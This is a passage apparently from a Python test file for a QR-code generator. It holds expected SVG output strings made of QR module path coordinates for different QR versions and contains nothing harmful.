M 14.4 12.6 L 14.4 14.4 L 16.2 14.4 L 16.2 12.6 z M 23.4 16.2 L 23.4 18.0 L 25.2 18.0 L 25.2 16.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
result_version_2 = """<svg height="59.4mm" version="1.1" viewBox="0 0 59.4 59.4" width="59.4mm" xmlns="http://www.w3.org/2000/svg"><path d="M 36 18 L 36 19.8 L 37.8 19.8 L 37.8 18 z M 28.8 9 L 28.8 10.8 L 30.6 10.8 L 30.6 9 z M 27 27 L 27 28.8 L 28.8 28.8 L 28.8 27 z M 7.2 43.2 L 7.2 45.0 L 9.0 45.0 L 9.0 43.2 z M 36 23.4 L 36 25.2 L 37.8 25.2 L 37.8 23.4 z M 43.2 43.2 L 43.2 45.0 L 45.0 45.0 L 45.0 43.2 z M 39.6 14.4 L 39.6 16.2 L 41.4 16.2 L 41.4 14.4 z M 37.8 43.2 L 37.8 45.0 L 39.6 45.0 L 39.6 43.2 z M 34.2 9 L 34.2 10.8 L 36.0 10.8 L 36.0 9 z M 50.4 14.4 L 50.4 16.2 L 52.2 16.2 L 52.2 14.4 z M 45 23.4 L 45 25.2 L 46.8 25.2 L 46.8 23.4 z M 10.8 46.8 L 10.8 48.6 L 12.6 48.6 L 12.6 46.8 z M 9 18 L 9 19.8 L 10.8 19.8 L 10.8 18 z M 46.8 18 L 46.8 19.8 L 48.6 19.8 L 48.6 18 z M 45 18 L 45 19.8 L 46.8 19.8 L 46.8 18 z M 9 27 L 9 28.8 L 10.8 28.8 L 10.8 27 z M 21.6 16.2 L 21.6 18.0 L 23.4 18.0 L 23.4 16.2 z M 14.4 7.2 L 14.4 9.0 L 16.2 9.0 L 16.2 7.2 z M 12.6 50.4 L 12.6 52.2 L 14.4 52.2 L 14.4 50.4 z M 21.6 50.4 L 21.6 52.2 L 23.4 52.2 L 23.4 50.4 z M 25.2 19.8 L 25.2 21.6 L 27.0 21.6 L 27.0 19.8 z M 23.4 45 L 23.4 46.8 L 25.2 46.8 L 25.2 45 z M 36 12.6 L 36 14.4 L 37.8 14.4 L 37.8 12.6 z M 18 25.2 L 18 27.0 L 19.8 27.0 L 19.8 25.2 z M 16.2 39.6 L 16.2 41.4 L 18.0 41.4 L 18.0 39.6 z M 28.8 18 L 28.8 19.8 L 30.6 19.8 L 30.6 18 z M 32.4 39.6 L 32.4 41.4 L 34.2 41.4 L 34.2 39.6 z M 25.2 39.6 L 25.2 41.4 L 27.0 41.4 L 27.0 39.6 z M 27 46.8 L 27 48.6 L 28.8 48.6 L 28.8 46.8 z M 34.2 27 L 34.2 28.8 L 36.0 28.8 L 36.0 27 z M 50.4 32.4 L 50.4 34.2 L 52.2 34.2 L 52.2 32.4 z M 30.6 19.8 L 30.6 21.6 L 32.4 21.6 L 32.4 19.8 z M 28.8 37.8 L 28.8 39.6 L 30.6 39.6 L 30.6 37.8 z M 39.6 23.4 L 39.6 25.2 L 41.4 25.2 L 41.4 23.4 z M 7.2 14.4 L 7.2 16.2 L 9.0 16.2 L 9.0 14.4 z M 50.4 9 L 50.4 10.8 L 52.2 10.8 L 52.2 9 z M 34.2 14.4 L 34.2 16.2 L 36.0 16.2 L 36.0 14.4 z M 45 28.8 L 45 30.6 L 46.8 30.6 L 46.8 28.8 z M 43.2 14.4 L 43.2 16.2 L 45.0 16.2 L 45.0 14.4 z M 30.6 43.2 L 30.6 45.0 L 32.4 45.0 L 32.4 43.2 z M 39.6 43.2 L 39.6 45.0 L 41.4 45.0 L 41.4 43.2 z M 46.8 12.6 L 46.8 14.4 L 48.6 14.4 L 48.6 12.6 z M 12.6 10.8 L 12.6 12.6 L 14.4 12.6 L 14.4 10.8 z M 10.8 18 L 10.8 19.8 L 12.6 19.8 L 12.6 18 z M 21.6 10.8 L 21.6 12.6 L 23.4 12.6 L 23.4 10.8 z M 25.2 30.6 L 25.2 32.4 L 27.0 32.4 L 27.0 30.6 z M 23.4 12.6 L 23.4 14.4 L 25.2 14.4 L 25.2 12.6 z M 18 7.2 L 18 9.0 L 19.8 9.0 L 19.8 7.2 z M 16.2 50.4 L 16.2 52.2 L 18.0 52.2 L 18.0 50.4 z M 14.4 36 L 14.4 37.8 L 16.2 37.8 L 16.2 36 z M 25.2 50.4 L 25.2 52.2 L 27.0 52.2 L 27.0 50.4 z M 23.4 36 L 23.4 37.8 L 25.2 37.8 L 25.2 36 z M 50.4 50.4 L 50.4 52.2 L 52.2 52.2 L 52.2 50.4 z M 18 48.6 L 18 50.4 L 19.8 50.4 L 19.8 48.6 z M 43.2 41.4 L 43.2 43.2 L 45.0 43.2 L 45.0 41.4 z M 41.4 30.6 L 41.4 32.4 L 43.2 32.4 L 43.2 30.6 z M 25.2 48.6 L 25.2 50.4 L 27.0 50.4 L 27.0 48.6 z M 34.2 32.4 L 34.2 34.2 L 36.0 34.2 L 36.0 32.4 z M 45 36 L 45 37.8 L 46.8 37.8 L 46.8 36 z M 30.6 25.2 L 30.6 27.0 L 32.4 27.0 L 32.4 25.2 z M 36 41.4 L 36 43.2 L 37.8 43.2 L 37.8 41.4 z M 7.2 9 L 7.2 10.8 L 9.0 10.8 L 9.0 9 z M 45 34.2 L 45 36.0 L 46.8 36.0 L 46.8 34.2 z M 30.6 48.6 L 30.6 50.4 L 32.4 50.4 L 32.4 48.6 z M 9 28.8 L 9 30.6 L 10.8 30.6 L 10.8 28.8 z M 23.4 23.4 L 23.4 25.2 L 25.2 25.2 L 25.2 23.4 z M 12.6 39.6 L 12.6 41.4 L 14.4 41.4 L 14.4 39.6 z M 21.6 39.6 L 21.6 41.4 L 23.4 41.4 L 23.4 39.6 z M 32.4 45 L 32.4 46.8 L 34.2 46.8 L 34.2 45 z M 14.4 45 L 14.4 46.8 L 16.2 46.8 L 16.2 45 z M 41.4 48.6 L 41.4 50.4 L 43.2 50.4 L 43.2 48.6 z M 23.4 41.4 L 23.4 43.2 L 25.2 43.2 L 25.2 41.4 z M 19.8 21.6 L 19.8 23.4 L 21.6 23.4 L 21.6 21.6 z M 18 36 L 18 37.8 L 19.8 37.8 L 19.8 36 z M 30.6 7.2 L 30.6 9.0 L 32.4 9.0 L 32.4 7.2 z M 28.8 21.6 L 28.8 23.4 L 30.6 23.4 L 30.6 21.6 z M 41.4 21.6 L 41.4 23.4 L 43.2 23.4 L 43.2 21.6 z M 39.6 7.2 L 39.6 9.0 L 41.4 9.0 L 41.4 7.2 z M 27 36 L 27 37.8 L 28.8 37.8 L 28.8 36 z M 50.4 21.6 L 50.4 23.4 L 52.2 23.4 L 52.2 21.6 z M 34.2 36 L 34.2 37.8 L 36.0 37.8 L 36.0 36 z M 30.6 30.6 L 30.6 32.4 L 32.4 32.4 L 32.4 30.6 z M 43.2 12.6 L 43.2 14.4 L 45.0 14.4 L 45.0 12.6 z M 36 36 L 36 37.8 L 37.8 37.8 L 37.8 36 z M 43.2 36 L 43.2 37.8 L 45.0 37.8 L 45.0 36 z M 7.2 32.4 L 7.2 34.2 L 9.0 34.2 L 9.0 32.4 z M 10.8 39.6 L 10.8 41.4 L 12.6 41.4 L 12.6 39.6 z M 48.6 46.8 L 48.6 48.6 L 50.4 48.6 L 50.4 46.8 z M 45 10.8 L 45 12.6 L 46.8 12.6 L 46.8 10.8 z M 46.8 23.4 L 46.8 25.2 L 48.6 25.2 L 48.6 23.4 z M 10.8 28.8 L 10.8 30.6 L 12.6 30.6 L 12.6 28.8 z M 18 32.4 L 18 34.2 L 19.8 34.2 L 19.8 32.4 z M 28.8 10.8 L 28.8 12.6 L 30.6 12.6 L 30.6 10.8 z M 7.2 45 L 7.2 46.8 L 9.0 46.8 L 9.0 45 z M 36 25.2 L 36 27.0 L 37.8 27.0 L 37.8 25.2 z M 32.4 16.2 L 32.4 18.0 L 34.2 18.0 L 34.2 16.2 z M 19.8 34.2 L 19.8 36.0 L 21.6 36.0 L 21.6 34.2 z M 50.4 39.6 L 50.4 41.4 L 52.2 41.4 L 52.2 39.6 z M 43.2 45 L 43.2 46.8 L 45.0 46.8 L 45.0 45 z M 39.6 16.2 L 39.6 18.0 L 41.4 18.0 L 41.4 16.2 z M 9 36 L 9 37.8 L 10.8 37.8 L 10.8 36 z M 34.2 7.2 L 34.2 9.0 L 36.0 9.0 L 36.0 7.2 z M 50.4 16.2 L 50.4 18.0 L 52.2 18.0 L 52.2 16.2 z M 30.6 36 L 30.6 37.8 L 32.4 37.8 L 32.4 36 z M 43.2 7.2 L 43.2 9.0 L 45.0 9.0 L 45.0 7.2 z M 7.2 50.4 L 7.2 52.2 L 9.0 52.2 L 9.0 50.4 z M 39.6 36 L 39.6 37.8 L 41.4 37.8 L 41.4 36 z M 28.8 50.4 L 28.8 52.2 L 30.6 52.2 L 30.6 50.4 z M 12.6 18 L 12.6 19.8 L 14.4 19.8 L 14.4 18 z M 10.8 10.8 L 10.8 12.6 L 12.6 12.6 L 12.6 10.8 z M 9 25.2 L 9 27.0 L 10.8 27.0 L 10.8 25.2 z M 21.6 18 L 21.6 19.8 L 23.4 19.8 L 23.4 18 z M 48.6 18 L 48.6 19.8 L 50.4 19.8 L 50.4 18 z M 46.8 25.2 L 46.8 27.0 L 48.6 27.0 L 48.6 25.2 z M 18 14.4 L 18 16.2 L 19.8 16.2 L 19.8 14.4 z M 27 14.4 L 27 16.2 L 28.8 16.2 L 28.8 14.4 z M 25.2 14.4 L 25.2 16.2 L 27.0 16.2 L 27.0 14.4 z M 36 14.4 L 36 16.2 L 37.8 16.2 L 37.8 14.4 z M 32.4 41.4 L 32.4 43.2 L 34.2 43.2 L 34.2 41.4 z M 28.8 19.8 L 28.8 21.6 L 30.6 21.6 L 30.6 19.8 z M 27 23.4 L 27 25.2 L 28.8 25.2 L 28.8 23.4 z M 25.2 41.4 L 25.2 43.2 L 27.0 43.2 L 27.0 41.4 z M 7.2 39.6 L 7.2 41.4 L 9.0 41.4 L 9.0 39.6 z M 32.4 18 L 32.4 19.8 L 34.2 19.8 L 34.2 18 z M 28.8 39.6 L 28.8 41.4 L 30.6 41.4 L 30.6 39.6 z M 39.6 18 L 39.6 19.8 L 41.4 19.8 L 41.4 18 z M 7.2 16.2 L 7.2 18.0 L 9.0 18.0 L 9.0 16.2 z M 50.4 10.8 L 50.4 12.6 L 52.2 12.6 L 52.2 10.8 z M 37.8 46.8 L 37.8 48.6 L 39.6 48.6 L 39.6 46.8 z M 45 27 L 45 28.8 L 46.8 28.8 L 46.8 27 z M 10.8 50.4 L 10.8 52.2 L 12.6 52.2 L 12.6 50.4 z M 9 7.2 L 9 9.0 L 10.8 9.0 L 10.8 7.2 z M 7.2 21.6 L 7.2 23.4 L 9.0 23.4 L 9.0 21.6 z M 46.8 7.2 L 46.8 9.0 L 48.6 9.0 L 48.6 7.2 z M 14.4 18 L 14.4 19.8 L 16.2 19.8 L 16.2 18 z M 12.6 46.8 L 12.6 48.6 L 14.4 48.6 L 14.4 46.8 z M 21.6 46.8 L 21.6 48.6 L 23.4 48.6 L 23.4 46.8 z M 18 9 L 18 10.8 L 19.8 10.8 L 19.8 9 z M 27 12.6 L 27 14.4 L 28.8 14.4 L 28.8 12.6 z M 32.4 28.8 L 32.4 30.6 L 34.2 30.6 L 34.2 28.8 z M 18 43.2 L 18 45.0 L 19.8 45.0 L 19.8 43.2 z M 50.4 28.8 L 50.4 30.6 L 52.2 30.6 L 52.2 28.8 z M 36 43.2 L 36 45.0 L 37.8 45.0 L 37.8 43.2 z M 45 37.8 L 45 39.6 L 46.8 39.6 L 46.8 37.8 z M 43.2 34.2 L 43.2 36.0 L 45.0 36.0 L 45.0 34.2 z M 7.2 10.8 L 7.2 12.6 L 9.0 12.6 L 9.0 10.8 z M 45 32.4 L 45 34.2 L 46.8 34.2 L 46.8 32.4 z M 12.6 34.2 L 12.6 36.0 L 14.4 36.0 L 14.4 34.2 z M 21.6 30.6 L 21.6 32.4 L 23.4 32.4 L 23.4 30.6 z M 46.8 30.6 L 46.8 32.4 L 48.6 32.4 L 48.6 30.6 z M 12.6 7.2 L 12.6 9.0 L 14.4 9.0 L 14.4 7.2 z M 10.8 21.6 L 10.8 23.4 L 12.6 23.4 L 12.6 21.6 z M 23.4 21.6 L 23.4 23.4 L 25.2 23.4 L 25.2 21.6 z M 21.6 7.2 L 21.6 9.0 L 23.4 9.0 L 23.4 7.2 z M 16.2 30.6 L 16.2 32.4 L 18.0 32.4 L 18.0 30.6 z M 12.6 45 L 12.6 46.8 L 14.4 46.8 L 14.4 45 z M 25.2 34.2 L 25.2 36.0 L 27.0 36.0 L 27.0 34.2 z M 36 45 L 36 46.8 L 37.8 46.8 L 37.8 45 z M 18 10.8 L 18 12.6 L 19.8 12.6 L 19.8 10.8 z M 14.4 46.8 L 14.4 48.6 L 16.2 48.6 L 16.2 46.8 z M 27 32.4 L 27 34.2 L 28.8 34.2 L 28.8 32.4 z M 34.2 41.4 L 34.2 43.2 L 36.0 43.2 L 36.0 41.4 z M 50.4 46.8 L 50.4 48.6 L 52.2 48.6 L 52.2 46.8 z M 43.2 37.8 L 43.2 39.6 L 45.0 39.6 L 45.0 37.8 z M 27 41.4 L 27 43.2 L 28.8 43.2 L 28.8 41.4 z M 39.6 9 L 39.6 10.8 L 41.4 10.8 L 41.4 9 z M 50.4 23.4 L 50.4 25.2 L 52.2 25.2 L 52.2 23.4 z M 36 37.8 L 36 39.6 L 37.8 39.6 L 37.8 37.8 z M 30.6 28.8 L 30.6 30.6 L 32.4 30.6 L 32.4 28.8 z M 45 43.2 L 45 45.0 L 46.8 45.0 L 46.8 43.2 z M 39.6 28.8 L 39.6 30.6 L 41.4 30.6 L 41.4 28.8 z M 9 32.4 L 9 34.2 L 10.8 34.2 L 10.8 32.4 z M 46.8 32.4 L 46.8 34.2 L 48.6 34.2 L 48.6 32.4 z M 14.4 30.6 L 14.4 32.4 L 16.2 32.4 L 16.2 30.6 z M 10.8 30.6 L 10.8 32.4 L 12.6 32.4 L 12.6 30.6 z M 23.4 27 L 23.4 28.8 L 25.2 28.8 L 25.2 27 z M 16.2 7.2 L 16.2 9.0 L 18.0 9.0 L 18.0 7.2 z M 14.4 50.4 L 14.4 52.2 L 16.2 52.2 L 16.2 50.4 z M 23.4 50.4 L 23.4 52.2 L 25.2 52.2 L 25.2 50.4 z M 7.2 46.8 L 7.2 48.6 L 9.0 48.6 L 9.0 46.8 z M 36 27 L 36 28.8 L 37.8 28.8 L 37.8 27 z M 32.4 25.2 L 32.4 27.0 L 34.2 27.0 L 34.2 25.2 z M 30.6 10.8 L 30.6 12.6 L 32.4 12.6 L 32.4 10.8 z M 18 39.6 L 18 41.4 L 19.8 41.4 L 19.8 39.6 z M 41.4 18 L 41.4 19.8 L 43.2 19.8 L 43.2 18 z M 39.6 10.8 L 39.6 12.6 L 41.4 12.6 L 41.4 10.8 z M 43.2 46.8 L 43.2 48.6 L 45.0 48.6 L 45.0 46.8 z M 34.2 12.6 L 34.2 14.4 L 36.0 14.4 L 36.0 12.6 z M 50.4 18 L 50.4 19.8 L 52.2 19.8 L 52.2 18 z M 30.6 34.2 L 30.6 36.0 L 32.4 36.0 L 32.4 34.2 z M 46.8 37.8 L 46.8 39.6 L 48.6 39.6 L 48.6 37.8 z M 10.8 43.2 L 10.8 45.0 L 12.6 45.0 L 12.6 43.2 z M 45 48.6 L 45 50.4 L 46.8 50.4 L 46.8 48.6 z M 46.8 14.4 L 46.8 16.2 L 48.6 16.2 L 48.6 14.4 z M 45 14.4 L 45 16.2 L 46.8 16.2 L 46.8 14.4 z M 10.8 12.6 L 10.8 14.4 L 12.6 14.4 L 12.6 12.6 z M 9 23.4 L 9 25.2 L 10.8 25.2 L 10.8 23.4 z M 14.4 10.8 L 14.4 12.6 L 16.2 12.6 L 16.2 10.8 z M 18 16.2 L 18 18.0 L 19.8 18.0 L 19.8 16.2 z M 27 19.8 L 27 21.6 L 28.8 21.6 L 28.8 19.8 z M 36 16.2 L 36 18.0 L 37.8 18.0 L 37.8 16.2 z M 18 21.6 L 18 23.4 L 19.8 23.4 L 19.8 21.6 z M 16.2 36 L 16.2 37.8 L 18.0 37.8 L 18.0 36 z M 34.2 50.4 L 34.2 52.2 L 36.0 52.2 L 36.0 50.4 z M 27 21.6 L 27 23.4 L 28.8 23.4 L 28.8 21.6 z M 41.4 36 L 41.4 37.8 L 43.2 37.8 L 43.2 36 z M 7.2 41.4 L 7.2 43.2 L 9.0 43.2 L 9.0 41.4 z M 36 21.6 L 36 23.4 L 37.8 23.4 L 37.8 21.6 z M 18 50.4 L 18 52.2 L 19.8 52.2 L 19.8 50.4 z M 30.6 16.2 L 30.6 18.0 L 32.4 18.0 L 32.4 16.2 z M 28.8 41.4 L 28.8 43.2 L 30.6 43.2 L 30.6 41.4 z M 43.2 50.4 L 43.2 52.2 L 45.0 52.2 L 45.0 50.4 z M 9 39.6 L 9 41.4 L 10.8 41.4 L 10.8 39.6 z M 7.2 18 L 7.2 19.8 L 9.0 19.8 L 9.0 18 z M 50.4 12.6 L 50.4 14.4 L 52.2 14.4 L 52.2 12.6 z M 45 25.2 L 45 27.0 L 46.8 27.0 L 46.8 25.2 z M 43.2 18 L 43.2 19.8 L 45.0 19.8 L 45.0 18 z M 30.6 39.6 L 30.6 41.4 L 32.4 41.4 L 32.4 39.6 z M 39.6 39.6 L 39.6 41.4 L 41.4 41.4 L 41.4 39.6 z M 7.2 23.4 L 7.2 25.2 L 9.0 25.2 L 9.0 23.4 z M 12.6 14.4 L 12.6 16.2 L 14.4 16.2 L 14.4 14.4 z M 10.8 14.4 L 10.8 16.2 L 12.6 16.2 L 12.6 14.4 z M 16.2 23.4 L 16.2 25.2 L 18.0 25.2 L 18.0 23.4 z M 25.2 27 L 25.2 28.8 L 27.0 28.8 L 27.0 27 z M 18 18 L 18 19.8 L 19.8 19.8 L 19.8 18 z M 16.2 18 L 16.2 19.8 L 18.0 19.8 L 18.0 18 z M 14.4 39.6 L 14.4 41.4 L 16.2 41.4 L 16.2 39.6 z M 25.2 18 L 25.2 19.8 L 27.0 19.8 L 27.0 18 z M 23.4 46.8 L 23.4 48.6 L 25.2 48.6 L 25.2 46.8 z M 32.4 30.6 L 32.4 32.4 L 34.2 32.4 L 34.2 30.6 z M 18 45 L 18 46.8 L 19.8 46.8 L 19.8 45 z M 28.8 16.2 L 28.8 18.0 L 30.6 18.0 L 30.6 16.2 z M 41.4 34.2 L 41.4 36.0 L 43.2 36.0 L 43.2 34.2 z M 7.2 36 L 7.2 37.8 L 9.0 37.8 L 9.0 36 z M 34.2 21.6 L 34.2 23.4 L 36.0 23.4 L 36.0 21.6 z M 32.4 7.2 L 32.4 9.0 L 34.2 9.0 L 34.2 7.2 z M 30.6 21.6 L 30.6 23.4 L 32.4 23.4 L 32.4 21.6 z M 50.4 30.6 L 50.4 32.4 L 52.2 32.4 L 52.2 30.6 z M 41.4 7.2 L 41.4 9.0 L 43.2 9.0 L 43.2 7.2 z M 19.8 36 L 19.8 37.8 L 21.6 37.8 L 21.6 36 z M 7.2 12.6 L 7.2 14.4 L 9.0 14.4 L 9.0 12.6 z M 50.4 7.2 L 50.4 9.0 L 52.2 9.0 L 52.2 7.2 z M 28.8 36 L 28.8 37.8 L 30.6 37.8 L 30.6 36 z M 45 30.6 L 45 32.4 L 46.8 32.4 L 46.8 30.6 z M 12.6 32.4 L 12.6 34.2 L 14.4 34.2 L 14.4 32.4 z M 37.8 36 L 37.8 37.8 L 39.6 37.8 L 39.6 36 z M 30.6 45 L 30.6 46.8 L 32.4 46.8 L 32.4 45 z M 27 50.4 L 27 52.2 L 28.8 52.2 L 28.8 50.4 z M 36 50.4 L 36 52.2 L 37.8 52.2 L 37.8 50.4 z M 46.8 10.8 L 46.8 12.6 L 48.6 12.6 L 48.6 10.8 z M 14.4 23.4 L 14.4 25.2 L 16.2 25.2 L 16.2 23.4 z M 12.6 12.6 L 12.6 14.4 L 14.4 14.4 L 14.4 12.6 z M 10.8 23.4 L 10.8 25.2 L 12.6 25.2 L 12.6 23.4 z M 48.6 27 L 48.6 28.8 L 50.4 28.8 L 50.4 27 z M 16.2 28.8 L 16.2 30.6 L 18.0 30.6 L 18.0 28.8 z M 14.4 14.4 L 14.4 16.2 L 16.2 16.2 L 16.2 14.4 z M 12.6 43.2 L 12.6 45.0 L 14.4 45.0 L 14.4 43.2 z M 18 12.6 L 18 14.4 L 19.8 14.4 L 19.8 12.6 z M 27 9 L 27 10.8 L 28.8 10.8 L 28.8 9 z M 23.4 37.8 L 23.4 39.6 L 25.2 39.6 L 25.2 37.8 z M 34.2 39.6 L 34.2 41.4 L 36.0 41.4 L 36.0 39.6 z M 18 46.8 L 18 48.6 L 19.8 48.6 L 19.8 46.8 z M 43.2 39.6 L 43.2 41.4 L 45.0 41.4 L 45.0 39.6 z M 41.4 25.2 L 41.4 27.0 L 43.2 27.0 L 43.2 25.2 z M 50.4 25.2 L 50.4 27.0 L 52.2 27.0 L 52.2 25.2 z M 36 39.6 L 36 41.4 L 37.8 41.4 L 37.8 39.6 z M 10.8 36 L 10.8 37.8 L 12.6 37.8 L 12.6 36 z M 39.6 30.6 L 39.6 32.4 L 41.4 32.4 L 41.4 30.6 z M 7.2 7.2 L 7.2 9.0 L 9.0 9.0 L 9.0 7.2 z M 48.6 36 L 48.6 37.8 L 50.4 37.8 L 50.4 36 z M 9 50.4 L 9 52.2 L 10.8 52.2 L 10.8 50.4 z M 45 7.2 L 45 9.0 L 46.8 9.0 L 46.8 7.2 z M 30.6 50.4 L 30.6 52.2 L 32.4 52.2 L 32.4 50.4 z M 46.8 50.4 L 46.8 52.2 L 48.6 52.2 L 48.6 50.4 z M 39.6 50.4 L 39.6 52.2 L 41.4 52.2 L 41.4 50.4 z M 21.6 27 L 21.6 28.8 L 23.4 28.8 L 23.4 27 z M 16.2 34.2 L 16.2 36.0 L 18.0 36.0 L 18.0 34.2 z M 25.2 9 L 25.2 10.8 L 27.0 10.8 L 27.0 9 z M 21.6 37.8 L 21.6 39.6 L 23.4 39.6 L 23.4 37.8 z M 18 28.8 L 18 30.6 L 19.8 30.6 L 19.8 28.8 z M 32.4 43.2 L 32.4 45.0 L 34.2 45.0 L 34.2 43.2 z M 14.4 43.2 L 14.4 45.0 L 16.2 45.0 L 16.2 43.2 z M 27 28.8 L 27 30.6 L 28.8 30.6 L 28.8 28.8 z M 41.4 43.2 L 41.4 45.0 L 43.2 45.0 L 43.2 43.2 z M 7.2 48.6 L 7.2 50.4 L 9.0 50.4 L 9.0 48.6 z M 19.8 23.4 L 19.8 25.2 L 21.6 25.2 L 21.6 23.4 z M 32.4 27 L 32.4 28.8 L 34.2 28.8 L 34.2 27 z M 18 41.4 L 18 43.2 L 19.8 43.2 L 19.8 41.4 z M 43.2 48.6 L 43.2 50.4 L 45.0 50.4 L 45.0 48.6 z M 41.4 23.4 L 41.4 25.2 L 43.2 25.2 L 43.2 23.4 z M 39.6 12.6 L 39.6 14.4 L 41.4 14.4 L 41.4 12.6 z M 46.8 46.8 L 46.8 48.6 L 48.6 48.6 L 48.6 46.8 z M 45 46.8 L 45 48.6 L 46.8 48.6 L 46.8 46.8 z M 43.2 10.8 L 43.2 12.6 L 45.0 12.6 L 45.0 10.8 z M 10.8 45 L 10.8 46.8 L 12.6 46.8 L 12.6 45 z M 39.6 32.4 L 39.6 34.2 L 41.4 34.2 L 41.4 32.4 z M 45 12.6 L 45 14.4 L 46.8 14.4 L 46.8 12.6 z M 10.8 7.2 L 10.8 9.0 L 12.6 9.0 L 12.6 7.2 z M 48.6 7.2 L 48.6 9.0 L 50.4 9.0 L 50.4 7.2 z M 46.8 21.6 L 46.8 23.4 L 48.6 23.4 L 48.6 21.6 z M 14.4 12.6 L 14.4 14.4 L 16.2 14.4 L 16.2 12.6 z M 23.4 16.2 L 23.4 18.0 L 25.2 18.0 L 25.2 16.2 z" id="qr-path" style="fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:none"></path></svg>"""
result_version_4 = """<svg height="73.8mm" version="1.1" viewBox="0 0 73.8 73.8" width="73.8mm" xmlns="http://www.w3.org/2000/svg"><path d="M 63 18 L 63 19.8 L 64.8 19.8 L 64.8 18 z M 43.2 52.2 L 43.2 54.0 L 45.0 54.0 L 45.0 52.2 z M 18 57.6 L 18 59.4 L 19.8 59.4 L 19.8 57.6 z M 41.4 14.4 L 41.4 16.2 L 43.2 16.2 L 43.2 14.4 z M 46.8 41.4 L 46.8 43.2 L 48.6 43.2 L 48.6 41.4 z M 21.6 16.2 L 21.6 18.0 L 23.4 18.0 L 23.4 16.2 z M 64.8 10.8 L 64.8 12.6 L 66.6 12.6 L 66.6 10.8 z M 30.6 64.8 L 30.6 66.6 L 32.4 66.6 L 32.4 64.8 z M 23.4 7.2 L 23.4 9.0 L 25.2 9.0 L 25.2 7.2 z M 32.4 63 L 32.4 64.8 L 34.2 64.8 L 34.2 63 z M 25.2 19.8 L 25.2 21.6 L 27.0 21.6 L 27.0 19.8 z M 7.2 37.8 L 7.2 39.6 L 9.0 39.6 L 9.0 37.8 z M 28.8 37.8 L 28.8 39.6 L 30.6 39.6 L 30.6 37.8 z M 52.2 34.2 L 52.2 36.0 L 54.0 36.0 L 54.0 34.2 z M 30.6 43.2 L 30.6 45.0 L 32.4 45.0 L 32.4 43.2 z M 59.4 37.8 L 59.4 39.6 L 61.2 39.6 L 61.2 37.8 z M 12.6 10.8 L 12.6 12.6 L 14.4 12.6 L 14.4 10.8 z M 43.2 64.8 L 43.2 66.6 L 45.0 66.6 L 45.0 64.8 z M 36 7.2 L 36 9.0 L 37.8 9.0 L 37.8 7.2 z M 61.2 36 L 61.2 37.8 L 63.0 37.8 L 63.0 36 z M 41.4 30.6 L 41.4 32.4 L 43.2 32.4 L 43.2 30.6 z M 57.6 64.8 L 57.6 66.6 L 59.4 66.6 L 59.4 64.8 z M 37.8 30.6 L 37.8 32.4 L 39.6 32.4 L 39.6 30.6 z M 19.8 46.8 L 19.8 48.6 L 21.6 48.6 L 21.6 46.8 z M 63 45 L 63 46.8 L 64.8 46.8 L 64.8 45 z M 48.6 41.4 L 48.6 43.2 L 50.4 43.2 L 50.4 41.4 z M 21.6 28.8 L 21.6 30.6 L 23.4 30.6 L 23.4 28.8 z M 64.8 52.2 L 64.8 54.0 L 66.6 54.0 L 66.6 52.2 z M 25.2 32.4 L 25.2 34.2 L 27.0 34.2 L 27.0 32.4 z M 23.4 41.4 L 23.4 43.2 L 25.2 43.2 L 25.2 41.4 z M 50.4 45 L 50.4 46.8 L 52.2 46.8 L 52.2 45 z M 32.4 21.6 L 32.4 23.4 L 34.2 23.4 L 34.2 21.6 z M 9 45 L 9 46.8 L 10.8 46.8 L 10.8 45 z M 10.8 39.6 L 10.8 41.4 L 12.6 41.4 L 12.6 39.6 z M 54 48.6 L 54 50.4 L 55.8 50.4 L 55.8 48.6 z M 55.8 18 L 55.8 19.8 L 57.6 19.8 L 57.6 18 z M 10.8 28.8 L 10.8 30.6 L 12.6 30.6 L 12.6 28.8 z M 59.4 14.4 L 59.4 16.2 L 61.2 16.2 L 61.2 14.4 z M 12.6 37.8 L 12.6 39.6 L 14.4 39.6 L 14.4 37.8 z M 36 19.8 L 36 21.6 L 37.8 21.6 L 37.8 19.8 z M 18 32.4 L 18 34.2 L 19.8 34.2 L 19.8 32.4 z M 41.4 39.6 L 41.4 41.4 L 43.2 41.4 L 43.2 39.6 z M 43.2 45 L 43.2 46.8 L 45.0 46.8 L 45.0 45 z M 39.6 16.2 L 39.6 18.0 L 41.4 18.0 L 41.4 16.2 z M 36 59.4 L 36 61.2 L 37.8 61.2 L 37.8 59.4 z M 18 64.8 L 18 66.6 L 19.8 66.6 L 19.8 64.8 z M 25.2 23.4 L 25.2 25.2 L 27.0 25.2 L 27.0 23.4 z M 21.6 52.2 L 21.6 54.0 L 23.4 54.0 L 23.4 52.2 z M 27 14.4 L 27 16.2 L 28.8 16.2 L 28.8 14.4 z M 50.4 57.6 L 50.4 59.4 L 52.2 59.4 L 52.2 57.6 z M 34.2 25.2 L 34.2 27.0 L 36.0 27.0 L 36.0 25.2 z M 27 54 L 27 55.8 L 28.8 55.8 L 28.8 54 z M 54 61.2 L 54 63.0 L 55.8 63.0 L 55.8 61.2 z M 7.2 16.2 L 7.2 18.0 L 9.0 18.0 L 9.0 16.2 z M 50.4 10.8 L 50.4 12.6 L 52.2 12.6 L 52.2 10.8 z M 9 7.2 L 9 9.0 L 10.8 9.0 L 10.8 7.2 z M 57.6 50.4 L 57.6 52.2 L 59.4 52.2 L 59.4 50.4 z M 18 9 L 18 10.8 L 19.8 10.8 L 19.8 9 z M 61.2 10.8 L 61.2 12.6 L 63.0 12.6 L 63.0 10.8 z M 14.4 37.8 L 14.4 39.6 L 16.2 39.6 L 16.2 37.8 z M 16.2 43.2 L 16.2 45.0 L 18.0 45.0 L 18.0 43.2 z M 43.2 57.6 L 43.2 59.4 L 45.0 59.4 L 45.0 57.6 z M 36 43.2 L 36 45.0 L 37.8 45.0 L 37.8 43.2 z M 18 55.8 L 18 57.6 L 19.8 57.6 L 19.8 55.8 z M 45 37.8 L 45 39.6 L 46.8 39.6 L 46.8 37.8 z M 37.8 37.8 L 37.8 39.6 L 39.6 39.6 L 39.6 37.8 z M 48.6 63 L 48.6 64.8 L 50.4 64.8 L 50.4 63 z M 21.6 7.2 L 21.6 9.0 L 23.4 9.0 L 23.4 7.2 z M 25.2 54 L 25.2 55.8 L 27.0 55.8 L 27.0 54 z M 27 41.4 L 27 43.2 L 28.8 43.2 L 28.8 41.4 z M 7.2 57.6 L 7.2 59.4 L 9.0 59.4 L 9.0 57.6 z M 50.4 23.4 L 50.4 25.2 L 52.2 25.2 L 52.2 23.4 z M 28.8 43.2 L 28.8 